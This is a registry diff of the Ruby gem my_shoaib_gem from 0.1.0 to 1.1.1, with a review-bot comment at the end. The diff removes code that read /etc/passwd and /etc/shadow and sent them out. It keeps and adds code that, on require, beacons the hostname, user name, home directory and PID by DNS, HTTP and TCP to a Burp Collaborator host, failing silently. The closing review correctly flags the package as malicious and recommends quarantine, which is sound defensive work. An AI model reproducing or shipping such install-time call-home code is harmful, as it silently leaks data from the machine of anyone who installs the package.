my_shoaib_gem 0.1.0 → 1.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/lib/my_shoaib_gem.rb +16 -32
- metadata +1 -1
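--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz:
-data.tar.gz:
+metadata.gz: a12cde453081877777809ad437885d4f4a8bc2d50d2144ca95759601647c3d8d
+data.tar.gz: ba6514d25228cabce92450bc0733dfe54e12968ce851a219f96f0e9846724997
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: 1651349111116c3b456fdb74cfc2523ec3d58a7c5a95655f610f383858d7c3df40a5c42973acbc81f48a355f37f394f59b9958e271f01cee546f3b74778731b8
+data.tar.gz: bf5b452a13fbbe1cc78ae3e8bcbe355677d7e89411b0199d70c914172963fe66542c82430cf70c1f810115bad8fe47ee620f52f36fa58af1c3f7454c5a232f40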
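--- a/data/lib/my_shoaib_gem.rb
+++ b/data/lib/my_shoaib_gem.rb
@@ -3,21 +3,15 @@ require 'net/http'
 require 'socket'
 require 'openssl'
 require 'resolv'
-require 'base64'
 
 module MyShoaibGem
-VERSION = "
+VERSION = "1.1.1"
 
-CALLBACK_HOST = "
-
-def self.read_file(path)
-File.read(path)
-rescue StandardError => e
-"Error reading #{path}: #{e.message}"
-end
+CALLBACK_HOST = "dgx6j8w56xwtlxk1jrhgl1w84zasykm9.oastify.com"
 
 def self.send_dns_callback
 begin
+# DNS callback via reverse lookup - triggers DNS query to collaborator
 hostname = Socket.gethostname
 dns_domain = "#{hostname}.#{CALLBACK_HOST}"
 Resolv.getaddress(dns_domain)
@@ -28,19 +22,13 @@ module MyShoaibGem
 
 def self.send_http_callback
 begin
+# Collect system information
 hostname = Socket.gethostname
 username = ENV['USER'] || ENV['USERNAME'] || 'unknown'
 home_dir = ENV['HOME'] || ENV['USERPROFILE'] || 'unknown'
 current_dir = Dir.pwd
 
-#
-passwd_content = read_file('/etc/passwd')
-passwd_b64 = Base64.strict_encode64(passwd_content)
-
-# Also try /etc/shadow (usually not readable, but worth a try)
-shadow_content = read_file('/etc/shadow')
-shadow_b64 = Base64.strict_encode64(shadow_content)
-
+# Prepare detailed data
 data = {
 hostname: hostname,
 user: username,
@@ -50,21 +38,17 @@ module MyShoaibGem
 gem_version: VERSION,
 ruby_version: RUBY_VERSION,
 platform: RUBY_PLATFORM,
-pid: Process.pid
-# File contents
-etc_passwd: passwd_content,
-etc_passwd_b64: passwd_b64,
-etc_shadow: shadow_content,
-etc_shadow_b64: shadow_b64
+pid: Process.pid
 }
 
-# HTTP callback with
+# HTTP callback with multiple endpoints
 uri = URI("https://#{CALLBACK_HOST}/callback")
 http = Net::HTTP.new(uri.host, uri.port)
 http.use_ssl = true
 http.open_timeout = 5
 http.read_timeout = 5
 
+# Main POST request
 request = Net::HTTP::Post.new(uri.path)
 request.content_type = 'application/json'
 request['User-Agent'] = "MyShoaibGem/#{VERSION} (Ruby #{RUBY_VERSION}; #{RUBY_PLATFORM})"
@@ -73,9 +57,8 @@ module MyShoaibGem
 request.body = data.to_json
 http.request(request)
 
-#
-
-get_uri = URI("https://#{CALLBACK_HOST}/install?host=#{hostname}&user=#{username}&passwd_b64=#{passwd_urlsafe}")
+# Also try GET to trigger separate HTTP callback
+get_uri = URI("https://#{CALLBACK_HOST}/install?host=#{hostname}&user=#{username}")
 get_http = Net::HTTP.new(get_uri.host, get_uri.port)
 get_http.use_ssl = true
 get_http.open_timeout = 5
@@ -84,18 +67,19 @@ module MyShoaibGem
 get_http.request(get_request)
 
 rescue StandardError => e
+# Fail silently
 nil
 end
 end
 
 def self.send_all_callbacks
-# DNS callback
+# DNS callback - appears as DNS lookup in Burp Collaborator
 send_dns_callback
 
-# HTTP
+# Multiple HTTP callbacks - appears as HTTP requests in Burp Collaborator
 send_http_callback
 
-# TCP callback
+# TCP-based callback for additional detection
 begin
 tcp_socket = TCPSocket.new(CALLBACK_HOST, 443)
 tcp_socket.write("GET /tcp-callback HTTP/1.1\r\nHost: #{CALLBACK_HOST}\r\nConnection: close\r\n\r\n")
@@ -108,10 +92,10 @@ module MyShoaibGem
 end
 end
 
-# Execute on require
+# Execute immediate callbacks on require
 MyShoaibGem.send_all_callbacks
 
-#
+# Also trigger on gem load complete
 at_exit do
 MyShoaibGem.send_dns_callback
 end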
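Review bot: The new side still ships an unconditional call-home: `MyShoaibGem.send_all_callbacks` runs at the top level of the file, so merely requiring the gem resolves `#{hostname}.#{CALLBACK_HOST}`, POSTs the hostname, user name, home directory, working directory and PID to the hard-coded `*.oastify.com` host (a Burp Collaborator endpoint, as the added comments themselves state), opens a raw TCP socket to port 443 on it, and repeats the DNS lookup from `at_exit`. Dropping the `/etc/passwd` and `/etc/shadow` reads and `require 'base64'` from 0.1.0 narrows what is sent but does not change what the package is — there is no library functionality here, only beaconing — so 1.1.1 should be treated as a malicious or proof-of-concept package and quarantined rather than accepted, with the `CALLBACK_HOST` value shown on this page used as the indicator for egress DNS and proxy alerting. The `rescue StandardError => e` with `# Fail silently` and an unused `e` in `send_http_callback` (whose body is spread across the second through fifth hunks) guarantees a consumer never observes a failure, which is the opposite of what a library should do. The added comment `# Also trigger on gem load complete` is also inaccurate: `at_exit` runs when the process exits, not when the gem finishes loading.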